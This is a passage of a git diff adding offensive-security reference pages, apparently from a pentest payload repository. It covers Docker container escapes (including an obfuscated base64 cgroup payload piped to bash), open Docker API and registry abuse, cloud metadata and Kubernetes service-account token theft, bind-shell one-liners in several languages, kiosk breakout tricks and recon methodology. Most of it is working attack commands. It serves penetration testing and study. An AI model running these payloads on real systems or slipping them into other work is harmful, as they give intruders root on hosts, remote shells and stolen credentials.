TTY Mode +chroot /host && clear +echo 'You are now on the underlying host' +chroot /host && clear +echo 'You are now on the underlying host' +/ # chroot /host && clear +/ # echo 'You are now on the underlying host' +You are now on the underlying host +/ # id +uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) +``` + + +## Open Docker API Port + +Prerequisite: +* Docker runned with `-H tcp://0.0.0.0:XXXX` + +```powershell +$ nmap -sCV 10.10.10.10 -p 2376 +2376/tcp open docker Docker 19.03.5 +| docker-version: +| Version: 19.03.5 +| MinAPIVersion: 1.12 +``` + +Mount the current system inside a new "temporary" Ubuntu container, you will gain root access to the filesystem in `/mnt`. + +```powershell +$ export DOCKER_HOST=tcp://10.10.10.10:2376 +$ docker run --name ubuntu_bash --rm -i -v /:/mnt -u 0 -t ubuntu bash +or +$ docker -H open.docker.socket:2375 ps +$ docker -H open.docker.socket:2375 exec -it mysql /bin/bash +or +$ curl -s –insecure https://tls-opendocker.socket:2376/secrets | jq +$ curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}' +``` + +From there you can backdoor the filesystem by adding an ssh key in `/root/.ssh` or adding a new root user in `/etc/passwd`. + + +## Insecure Docker Registry + +Docker Registry’s fingerprint is `Docker-Distribution-Api-Version` header. Then connect to Registry API endpoint: `/v2/_catalog`. + +```powershell +curl https://registry.example.com/v2//tags/list +docker pull https://registry.example.com:443/: + +# connect to the endpoint and list image blobs +curl -s -k --user "admin:admin" https://docker.registry.local/v2/_catalog +curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/tags/list +curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/manifests/latest +# download blobs +curl -s -k --user 'admin:admin' 'http://docker.registry.local/v2/wordpress-image/blobs/sha256:c314c5effb61c9e9c534c81a6970590ef4697b8439ec6bb4ab277833f7315058' > out.tar.gz +# automated download +https://github.com/NotSoSecure/docker_fetch/ +python /opt/docker_fetch/docker_image_fetch.py -u http://admin:admin@docker.registry.local +``` + +Access a private registry and start a container with one of its image + +```powershell +docker login -u admin -p admin docker.registry.local +docker pull docker.registry.local/wordpress-image +docker run -it docker.registry.local/wordpress-image /bin/bash +``` + +Access a private registry using OAuth Token from Google + +```powershell +curl http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/email +curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token +docker login -e -u oauth2accesstoken -p "" https://gcr.io +``` + +## Exploit privileged container abusing the Linux cgroup v1 + +Prerequisite (at least one): + * `--privileged` + * `--security-opt apparmor=unconfined --cap-add=SYS_ADMIN` flags. + + +### Abusing CAP_SYS_ADMIN capability + +```powershell +docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash -c 'echo "cm5kX2Rpcj0kKGRhdGUgKyVzIHwgbWQ1c3VtIHwgaGVhZCAtYyAxMCkKbWtkaXIgL3RtcC9jZ3JwICYmIG1vdW50IC10IGNncm91cCAtbyByZG1hIGNncm91cCAvdG1wL2NncnAgJiYgbWtkaXIgL3RtcC9jZ3JwLyR7cm5kX2Rpcn0KZWNobyAxID4gL3RtcC9jZ3JwLyR7cm5kX2Rpcn0vbm90aWZ5X29uX3JlbGVhc2UKaG9zdF9wYXRoPWBzZWQgLW4gJ3MvLipccGVyZGlyPVwoW14sXSpcKS4qL1wxL3AnIC9ldGMvbXRhYmAKZWNobyAiJGhvc3RfcGF0aC9jbWQiID4gL3RtcC9jZ3JwL3JlbGVhc2VfYWdlbnQKY2F0ID4gL2NtZCA8PCBfRU5ECiMhL2Jpbi9zaApjYXQgPiAvcnVubWUuc2ggPDwgRU9GCnNsZWVwIDMwIApFT0YKc2ggL3J1bm1lLnNoICYKc2xlZXAgNQppZmNvbmZpZyBldGgwID4gIiR7aG9zdF9wYXRofS9vdXRwdXQiCmhvc3RuYW1lID4+ICIke2hvc3RfcGF0aH0vb3V0cHV0IgppZCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKcHMgYXh1IHwgZ3JlcCBydW5tZS5zaCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKX0VORAoKIyMgTm93IHdlIHRyaWNrIHRoZSBkb2NrZXIgZGFlbW9uIHRvIGV4ZWN1dGUgdGhlIHNjcmlwdC4KY2htb2QgYSt4IC9jbWQKc2ggLWMgImVjaG8gXCRcJCA+IC90bXAvY2dycC8ke3JuZF9kaXJ9L2Nncm91cC5wcm9jcyIKIyMgV2FpaWlpaXQgZm9yIGl0Li4uCnNsZWVwIDYKY2F0IC9vdXRwdXQKZWNobyAi4oCiPygowq/CsMK3Ll8u4oCiIHByb2ZpdCEg4oCiLl8uwrfCsMKvKSnYn+KAoiIK" | base64 -d | bash -' +``` + +Exploit breakdown : + +```powershell +# On the host +docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash + +# In the container +mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x + +echo 1 > /tmp/cgrp/x/notify_on_release +host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` +echo "$host_path/cmd" > /tmp/cgrp/release_agent + +echo '#!/bin/sh' > /cmd +echo "ps aux > $host_path/output" >> /cmd +chmod a+x /cmd + +sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" +``` + +### Abusing coredumps and core_pattern + +1. Find the mounting point using `mount` + ```ps1 + $ mount | head -n 1 + overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/YLH6C6EQMMG7DA2AL5DUANDHYJ:/var/lib/docker/overlay2/l/HP7XLDFT4ERSCYVHJ2WMZBG2YT,upperdir=/var/lib/docker/overlay2/c51a87501842b287018d22e9d09d7d8dc4ede83a867f36ca199434d5ea5ac8f5/diff,workdir=/var/lib/docker/overlay2/c51a87501842b287018d22e9d09d7d8dc4ede83a867f36ca199434d5ea5ac8f5/work) + ``` +2. Create an evil binary at the root of the filesystem: `cp /tmp/poc /poc` +3. Set the program to be executed on the coredumps + ```ps1 + echo "|/var/lib/docker/overlay2/c51a87501842b287018d22e9d09d7d8dc4ede83a867f36ca199434d5ea5ac8f5/diff/poc" > /proc/sys/kernel/core_pattern + ``` +4. Generate a coredump with a faulty program: `gcc -o crash crash.c && ./crash` + ```cpp + int main(void) { + char buf[1]; + for (int i = 0; i < 100; i++) { + buf[i] = 1; + } + return 0; + } + ``` +5. Your payload should have been executed on the host + + +## Breaking out of Docker via runC + +> The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command ... as root within a container in either of these contexts: Creating a new container using an attacker-controlled image. Attaching (docker exec) into an existing container which the attacker had previous write access to. - Vulnerability overview by the runC team + +Exploit for CVE-2019-5736 : https://github.com/twistlock/RunC-CVE-2019-5736 + +```powershell +$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC +$ docker run --rm cve-2019-5736:malicious_image_POC +``` + +## Breaking out of containers using a device file + +```powershell +https://github.com/FSecureLABS/fdpasser +In container, as root: ./fdpasser recv /moo /etc/shadow +Outside container, as UID 1000: ./fdpasser send /proc/$(pgrep -f "sleep 1337")/root/moo +Outside container: ls -la /etc/shadow +Output: -rwsrwsrwx 1 root shadow 1209 Oct 10 2019 /etc/shadow +``` + + +## Breaking out of Docker via kernel modules loading + +> When privileged Linux containers attempt to load kernel modules, the modules are loaded into the host's kernel (because there is only *one* kernel, unlike VMs). This provides a route to an easy container escape. + +Exploitation: +* Clone the repository : `git clone https://github.com/xcellerator/linux_kernel_hacking/tree/master/3_RootkitTechniques/3.8_privileged_container_escaping` +* Build with `make` +* Start a privileged docker container with `docker run -it --privileged --hostname docker --mount "type=bind,src=$PWD,dst=/root" ubuntu` +* `cd /root` in the new container +* Insert the kernel module with `./escape` +* Run `./execute`! + +Unlike other techniques, this module doesn't contain any syscalls hooks, but merely creates two new proc files; `/proc/escape` and `/proc/output`. + +* `/proc/escape` only answers to write requests and simply executes anything that's passed to it via [`call_usermodehelper()`](https://www.kernel.org/doc/htmldocs/kernel-api/API-call-usermodehelper.html). +* `/proc/output` just takes input and stores it in a buffer when written to, then returns that buffer when it's read from - essentially acting a like a file that both the container and the host can read/write to. + +The clever part is that anything we write to `/proc/escape` gets sandwiched into `/bin/sh -c > /proc/output`. This means that the command is run under `/bin/sh` and the output is redirected to `/proc/output`, which we can then read from within the container. + +Once the module is loaded, you can simply `echo "cat /etc/passwd" > /proc/escape` and then get the result via `cat /proc/output`. Alternatively, you can use the `execute` program to give yourself a makeshift shell (albeit an extraordinarily basic one). + +The only caveat is that we cannot be sure that the container has `kmod` installed (which provides `insmod` and `rmmod`). To overcome this, after building the kernel module, we load it's byte array into a C program, which then uses the `init_module()` syscall to load the module into the kernel without needing `insmod`. If you're interested, take a look at the Makefile. + + +## References + +- [Hacking Docker Remotely - 17 March 2020 - ch0ks](https://hackarandas.com/blog/2020/03/17/hacking-docker-remotely/) +- [Understanding Docker container escapes - JULY 19, 2019 - Trail of Bits](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) +- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0) +- [Breaking out of Docker via runC – Explaining CVE-2019-5736 - Yuval Avrahami - February 21, 2019](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/) +- [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host - dragonsector.pl](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) +- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md) +- [Anatomy of a hack: Docker Registry - NotSoSecure - April 6, 2017](https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/) +- [Linux Kernel Hacking 3.8: Privileged Container Escapes - Harvey Phillips @xcellerator](https://github.com/xcellerator/linux_kernel_hacking/tree/master/3_RootkitTechniques/3.8_privileged_container_escaping) +* [Escaping privileged containers for fun - 2022-03-06 :: Jordy Zomer](https://pwning.systems/posts/escaping-containers-for-fun/) \ No newline at end of file diff --git a/docs/containers/Container - Kubernetes Pentest.md b/docs/containers/Container - Kubernetes Pentest.md new file mode 100644 index 0000000..5d39b0f --- /dev/null +++ b/docs/containers/Container - Kubernetes Pentest.md @@ -0,0 +1,67 @@ +# Container - Kubernetes + +> Kubernetes, often abbreviated as K8s, is an open-source container orchestration platform designed to automate the deployment, scaling, and management of containerized applications + +## Summary + +- [Tools](#tools) +- [Exploits](#exploits) + - [Accessible kubelet on 10250/TCP](#accessible-kubelet-on-10250tcp) + - [Obtaining Service Account Token](#obtaining-service-account-token) +- [References](#references) + +## Tools + +* [BishopFox/badpods](https://github.com/BishopFox/badpods) - A collection of manifests that will create pods with elevated privileges. + ```ps1 + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv/pod/priv-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/pod/hostpath-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/pod/hostpid-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml + kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml + ``` +* [serain/kubelet-anon-rce](https://github.com/serain/kubelet-anon-rce) - Executes commands in a container on a kubelet endpoint that allows anonymous authentication +* [DataDog/KubeHound](https://github.com/DataDog/KubeHound) - Kubernetes Attack Graph + ```ps1 + # Critical paths enumeration + kh.containers().criticalPaths().count() + kh.containers().dedup().by("name").criticalPaths().count() + kh.endpoints(EndpointExposure.ClusterIP).criticalPaths().count() + kh.endpoints(EndpointExposure.NodeIP).criticalPaths().count() + kh.endpoints(EndpointExposure.External).criticalPaths().count() + kh.services().criticalPaths().count() + + # DNS services and port + kh.endpoints(EndpointExposure.External).criticalPaths().limit(local,1) + .dedup().valueMap("serviceDns","port") + .group().by("serviceDns").by("port") + ``` + +## Exploits + +### Accessible kubelet on 10250/TCP + +Requirements: +* `--anonymous-auth`: Enables anonymous requests to the Kubelet server + +* Getting pods: `curl -ks https://worker:10250/pods` +* Run commands: `curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} -d 'input=1' -d 'output=1' -d'tty=1' -d 'command=ls' -d 'command=/'` + + +### Obtaining Service Account Token + +Token is stored at `/var/run/secrets/kubernetes.io/serviceaccount/token` + +Use the service account token: +* on `kube-apiserver` API: `curl -ks -H "Authorization: Bearer " https://master:6443/api/v1/namespaces/{namespace}/secrets` +* with kubectl: ` kubectl --insecure-skip-tls-verify=true --server="https://master:6443" --token="" get secrets --all-namespaces -o json` + + +## References + +* [Attacking Kubernetes through Kubelet - Withsecure Labs- 11 January, 2019](https://labs.withsecure.com/publications/attacking-kubernetes-through-kubelet) +* [kubehound - Attack Reference](https://kubehound.io/reference/attacks/) +* [KubeHound: Identifying attack paths in Kubernetes clusters - Datadog - October 2, 2023](https://securitylabs.datadoghq.com/articles/kubehound-identify-kubernetes-attack-paths/) \ No newline at end of file diff --git a/docs/methodology/Methodology and enumeration.md b/docs/methodology/Methodology and enumeration.md new file mode 100644 index 0000000..e6d2081 --- /dev/null +++ b/docs/methodology/Methodology and enumeration.md @@ -0,0 +1,149 @@ +# Bug Hunting Methodology and Enumeration + +## Summary + +* [Passive Recon](#passive-recon) + * Shodan + * Wayback Machine + * The Harvester + * Github OSINT + +* [Active Recon](#active-recon) + * [Network discovery](#network-discovery) + * [Web discovery](#web-discovery) + +* [Web Vulnerabilities](#looking-for-web-vulnerabilities) + +## Passive recon + +* Using [Shodan](https://www.shodan.io/) to detect similar app + + ```bash + can be integrated with nmap (https://github.com/glennzw/shodan-hq-nse) + nmap --script shodan-hq.nse --script-args 'apikey=,target=' + ``` + +* Using [The Wayback Machine](https://archive.org/web/) to detect forgotten endpoints + + ```bash + look for JS files, old links + curl -sX GET "http://web.archive.org/cdx/search/cdx?url=&output=text&fl=original&collapse=urlkey&matchType=prefix" + ``` + +* Using [The Harvester](https://github.com/laramies/theHarvester) + + ```python + python theHarvester.py -b all -d domain.com + ``` + +* Look for private information in [GitHub]() repos with [GitRob](https://github.com/michenriksen/gitrob.git) + ```bash + gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2 + ``` + +* Perform Google Dorks search + + +## Active recon + +### Network discovery + +* Subdomains enumeration + * Enumerate already found subdomains: [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder): `subfinder -d hackerone.com` + * Permutate subdomains: [infosec-au/altdns](https://github.com/infosec-au/altdns) + * Bruteforce subdomains: [Josue87/gotator](https://github.com/Josue87/gotator) + * Subdomain takeovers: [EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz) + +* Network discovery + * Scan IP ranges with `nmap`, [robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) and [projectdiscovery/naabu](https://github.com/projectdiscovery/naabu) + * Discover services, version and banners + +* Review latest acquisitions + +* ASN enumeration + * [projectdiscovery/asnmap](https://github.com/projectdiscovery/asnmap): `asnmap -a AS45596 -silent` + +* DNS Zone Transfer + ```ps1 + host -t ns domain.local + domain.local name server master.domain.local. + + host master.domain.local + master.domain.local has address 192.168.1.1 + + dig axfr domain.local @192.168.1.1 + ``` + +### Web discovery + +* Locate `robots.txt`, `security.txt`, `sitemap.xml` files +* Retrieve comments in source code +* Discover URL: [tomnomnom/waybackurls](github.com/tomnomnom/waybackurls) +* Search for `hidden` parameters: [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner) + +* List all the subdirectories and files with `gobuster` or `ffuf` + ```ps1 + # gobuster -w wordlist -u URL -t threads + ./gobuster -u http://example.com/ -w words.txt -t 10 + ``` + +* Find backup files with [mazen160/bfac](https://github.com/mazen160/bfac) + ```bash + bfac --url http://example.com/test.php --level 4 + bfac --list testing_list.txt + ``` + +* Map technologies: Web service enumeration using [projectdiscovery/httpx](https://github.com/projectdiscovery/httpx) or Wappalyzer + * Gather favicon hash, JARM fingerprint, ASN, status code, services and technologies (Github Pages, Cloudflare, Ruby, Nginx,...) + +* Take screenshots for every websites using [sensepost/gowitness](https://github.com/sensepost/gowitness) + +* Automated vulnerability scanners + * [projectdiscovery/nuclei](https://github.com/projectdiscovery/nuclei): `nuclei -u https://example.com` + * [Burp Suite's web vulnerability scanner](https://portswigger.net/burp/vulnerability-scanner) + * [sullo/nikto](https://github.com/sullo/nikto): `./nikto.pl -h http://www.example.com` + +* Manual Testing: Explore the website with a proxy: + * [Caido - A lightweight web security auditing toolkit](https://caido.io/) + * [ZAP - OWASP Zed Attack Proxy](https://www.zaproxy.org/) + * [Burp Suite - Community Edition](https://portswigger.net/burp/communitydownload) + + +## Looking for Web vulnerabilities + +* Explore the website and look for vulnerabilities listed in this repository: SQL injection, XSS, CRLF, Cookies, .... +* Test for Business Logic weaknesses + * High or negative numerical values + * Try all the features and click all the buttons +* [The Web Application Hacker's Handbook Checklist](https://gist.github.com/gbedoya/10935137) copied from http://mdsec.net/wahh/tasks.html + +* Subscribe to the site and pay for the additional functionality to test + +* Inspect Payment functionality - [@gwendallecoguic](https://twitter.com/gwendallecoguic/status/988138794686779392) + > if the webapp you're testing uses an external payment gateway, check the doc to find the test credit numbers, purchase something and if the webapp didn't disable the test mode, it will be free + + From https://stripe.com/docs/testing#cards : "Use any of the following test card numbers, a valid expiration date in the future, and any random CVC number, to create a successful payment. Each test card's billing country is set to U.S. " + e.g : + + Test card numbers and tokens + + | NUMBER | BRAND | TOKEN | + | :------------- | :------------- | :------------- | + | 4242424242424242 | Visa | tok_visa | + | 4000056655665556 | Visa (debit) | tok_visa_debit | + | 5555555555554444 | Mastercard | tok_mastercard | + + International test card numbers and tokens + + | NUMBER | TOKEN | COUNTRY | BRAND | + | :------------- | :------------- | :------------- | :------------- | + | 4000000400000008 | tok_at | Austria (AT) | Visa | + | 4000000560000004 | tok_be | Belgium (BE) | Visa | + | 4000002080000001 | tok_dk | Denmark (DK) | Visa | + | 4000002460000001 | tok_fi | Finland (FI) | Visa | + | 4000002500000003 | tok_fr | France (FR) | Visa | + +## References + +* [[BugBounty] Yahoo phpinfo.php disclosure - Patrik Fehrenbach](http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/) +* [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/) diff --git a/docs/methodology/Vulnerability Reports.md b/docs/methodology/Vulnerability Reports.md new file mode 100644 index 0000000..73c1f3b --- /dev/null +++ b/docs/methodology/Vulnerability Reports.md @@ -0,0 +1,52 @@ +# Vulnerability Reports + +## Summary + +* [Tools](#tools) +* [Vulnerability Report Structure](#vulnerability-report-structure) +* [Vulnerability Details Structure](#vulnerability-details-structure) +* [General Guidelines](#general-guidelines) +* [References](#references) + + +## Tools + +Tools to help you collaborate and generate your reports. + +* [GhostManager/Ghostwriter](https://github.com/GhostManager/Ghostwriter) - The SpecterOps project management and reporting engine +* [pwndoc/pwndoc](https://github.com/pwndoc/pwndoc) - Pentest Report Generator + +List of penetration test reports and templates. + +* [reconmap/pentest-reports](https://github.com/reconmap/pentest-reports) - Collection of penetration test reports and pentest report templates +* [juliocesarfort/public-pentesting-reports](https://github.com/juliocesarfort/public-pentesting-reports) - A list of public penetration test reports published by several consulting firms and academic security groups. + + +## Vulnerability Report Structure + +* Executive Summary +* Security Findings and Recommendations +* Vulnerabilities (sorted by severity) +* Appendix (optional) + + +## Vulnerability Details Structure + +* **Summary**: a concise introduction to the vulnerability, providing a snapshot of the issue and its potential reach.. +* **Impact**: detailed insights into the potential business ramifications that could arise from exploiting this vulnerability. +* **Reproductions Steps**: a comprehensive, step-by-step walkthrough on how to replicate the issue,, complete with screenshots, HTTP requests or Proof of Concept code snippets. +* **Recommendations**: suggestions and best practices for addressing and resolving the highlighted issue. +* **References**: links to external content, documentation, and security guidelines, including resources like OWASP. +* **Severity**: Include a severity score like CVSS. + + +## General Guidelines + +* Use a **Passive Voice Form**. +* **Obfuscate** the secrets: passwords, token, ... +* Add **caption** to all figures and pictures. + +## References + +* [Best Practices for Writing Quality Vulnerability Reports - Krzysztof Pranczk](https://itnext.io/best-practices-for-writing-quality-vulnerability-reports-119882422a27) +* [Overview of technical writing courses - Google Technical Writing](https://developers.google.com/tech-writing/overview) \ No newline at end of file diff --git a/docs/pentest/Bind Shell Cheatsheet.md b/docs/pentest/Bind Shell Cheatsheet.md new file mode 100644 index 0000000..c51bb7e --- /dev/null +++ b/docs/pentest/Bind Shell Cheatsheet.md @@ -0,0 +1,95 @@ +# Bind Shell + +## Summary + +* [Bind Shell](#bind-shell) + * [Perl](#perl) + * [Python](#python) + * [PHP](#php) + * [Ruby](#ruby) + * [Netcat Traditional](#netcat-traditional) + * [Netcat OpenBsd](#netcat-openbsd) + * [Ncat](#ncat) + * [Socat](#socat) + * [Powershell](#powershell) + + +## Perl + +```perl +perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\ +bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\ +close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};' +``` + +## Python + +Single line : +```python +python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",51337));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")' +``` + +Expanded version : + +```python +import socket as s,subprocess as sp; + +s1 = s.socket(s.AF_INET, s.SOCK_STREAM); +s1.setsockopt(s.SOL_SOCKET, s.SO_REUSEADDR, 1); +s1.bind(("0.0.0.0", 51337)); +s1.listen(1); +c, a = s1.accept(); + +while True: + d = c.recv(1024).decode(); + p = sp.Popen(d, shell=True, stdout=sp.PIPE, stderr=sp.PIPE, stdin=sp.PIPE); + c.sendall(p.stdout.read()+p.stderr.read()) +``` + +## PHP + +```php +php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\ +socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\ +$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\ + socket_write($cl,$m,strlen($m));}}' +``` + +## Ruby + +```ruby +ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)' +``` + +## Netcat Traditional + +```powershell +nc -nlvp 51337 -e /bin/bash +``` + +## Netcat OpenBsd + +```powershell +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f +``` + +## Socat + +```powershell +user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 +user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane +``` + +## Powershell + +```powershell +https://github.com/besimorhino/powercat + +# Victim (listen) +. .\powercat.ps1 +powercat -l -p 7002 -ep + +# Connect from attacker +. .\powercat.ps1 +powercat -c 127.0.0.1 -p 7002 +``` diff --git a/docs/pentest/Escape Breakout.md b/docs/pentest/Escape Breakout.md new file mode 100644 index 0000000..8fb8528 --- /dev/null +++ b/docs/pentest/Escape Breakout.md @@ -0,0 +1,152 @@ +# Application Escape and Breakout + +## Summary + +* [Gaining a command shell](#gaining-a-command-shell) +* [Sticky Keys](#sticky-keys) +* [Dialog Boxes](#dialog-boxes) + * [Creating new files](#creating-new-files) + * [Open a new Windows Explorer instance](#open-a-new-windows-explorer-instance) + * [Exploring Context Menus](#exploring-context-menus) + * [Save as](#save-as) + * [Input Boxes](#input-boxes) + * [Bypass file restrictions](#bypass-file-restrictions) +* [Internet Explorer](#internet-explorer) +* [Shell URI Handlers](#shell-uri-handlers) +* [References](#references) + +## Gaining a command shell + +* **Shortcut** + * [Window] + [R] -> cmd + * [CTRL] + [SHIFT] + [ESC] -> Task Manager + * [CTRL] + [ALT] + [DELETE] -> Task Manager +* **Access through file browser**: Browsing to the folder containing the binary (i.e. `C:\windows\system32\`), we can simply right click and `open` it +* **Drag-and-drop**: dragging and dropping any file onto the cmd.exe +* **Hyperlink**: `file:///c:/Windows/System32/cmd.exe` +* **Task Manager**: `File` > `New Task (Run...)` > `cmd` +* **MSPAINT.exe** + * Open MSPaint.exe and set the canvas size to: `Width=6` and `Height=1` pixels + * Zoom in to make the following tasks easier + * Using the colour picker, set pixels values to (from left to right): + ```ps1 + 1st: R: 10, G: 0, B: 0 + 2nd: R: 13, G: 10, B: 13 + 3rd: R: 100, G: 109, B: 99 + 4th: R: 120, G: 101, B: 46 + 5th: R: 0, G: 0, B: 101 + 6th: R: 0, G: 0, B: 0 + ``` + * Save it as 24-bit Bitmap (*.bmp;*.dib) + * Change its extension from bmp to bat and run + + +## Sticky Keys + +* Spawn the sticky keys dialog + * Via Shell URI : `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` + * Hit 5 times [SHIFT] +* Visit "Ease of Access Center" +* You land on "Setup Sticky Keys", move up a level on "Ease of Access Center" +* Start the OSK (On-Screen-Keyboard) +* You can now use the keyboard shortcut (CTRL+N) + +## Dialog Boxes + +### Creating new files + +* Batch files – Right click > New > Text File > rename to .BAT (or .CMD) > edit > open +* Shortcuts – Right click > New > Shortcut > `%WINDIR%\system32` + +## Open a new Windows Explorer instance + +* Right click any folder > select `Open in new window` + +## Exploring Context Menus + +* Right click any file/folder and explore context menus +* Clicking `Properties`, especially on shortcuts, can yield further access via `Open File Location` + +### Save as + +* "Save as" / "Open as" option +* "Print" feature – selecting "print to file" option (XPS/PDF/etc) +* `\\127.0.0.1\c$\Windows\System32\` and execute `cmd.exe` + +### Input Boxes + +Many input boxes accept file paths; try all inputs with UNC paths such as `//attacker–pc/` or `//127.0.0.1/c$` or `C:\` + + +### Bypass file restrictions + +Enter *.* or *.exe or similar in `File name` box + +## Internet Explorer + +### Download and Run/Open + +* Text files -> opened by Notepad + +### Menus + +* The address bar +* Search menus +* Help menus +* Print menus +* All other menus that provide dialog boxes + +### Accessing filesystem + +Enter these paths in the address bar: + +* file://C:/windows +* C:/windows/ +* %HOMEDRIVE% +* \\127.0.0.1\c$\Windows\System32 + +### Unassociated Protocols + +It is possible to escape a browser based kiosk with other protocols than usual `http` or `https`. +If you have access to the address bar, you can use any known protocol (`irc`, `ftp`, `telnet`, `mailto`, etc.) +to trigger the *open with* prompt and select a program installed on the host. +The program will than be launched with the uri as a parameter, you need to select a program that will not crash when recieving it. +It is possible to send multiple parameters to the program by adding spaces in your uri. + +Note: This technique required that the protocol used is not already associated with a program. + +Example - Launching Firefox with a custom profile: + +This is a nice trick since Firefox launched with the custom profile may not be as much hardened as the default profile. + +0. Firefox need to be installed. +1. Enter the following uri in the address bar: `irc://127.0.0.1 -P "Test"` +2. Press enter to navigate to the uri. +3. Select the firefox program. +4. Firefox will be launched with the profile `Test`. + +In this example, it's the equivalent of running the following command: +``` +firefox irc://127.0.0.1 -P "Test" +``` + + +## Shell URI Handlers + +* shell:DocumentsLibrary +* shell:Librariesshell:UserProfiles +* shell:Personal +* shell:SearchHomeFolder +* shell:System shell:NetworkPlacesFolder +* shell:SendTo +* shell:Common Administrative Tools +* shell:MyComputerFolder +* shell:InternetFolder + +## References + +* [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/) +* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/) +* [Escaping from KIOSKs - HackTricks](https://book.hacktricks.xyz/physical-attacks/escaping-from-gui-applications) +* [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/) +* [HOW TO LAUNCH COMMAND PROMPT AND POWERSHELL FROM MS PAINT - 2022-05-14 - Rickard](https://tzusec.com/how-to-launch-command-prompt-and-powershell-from-ms-paint/) \ No newline at end of file diff --git a/docs/pentest/Hash Cracking.md b/docs/pentest/Hash Cracking.md new file mode 100644 index 0000000..b3ea6f4 --- /dev/null +++ b/docs/pentest/Hash Cracking.md @@ -0,0 +1,169 @@ +# Hash Cracking + 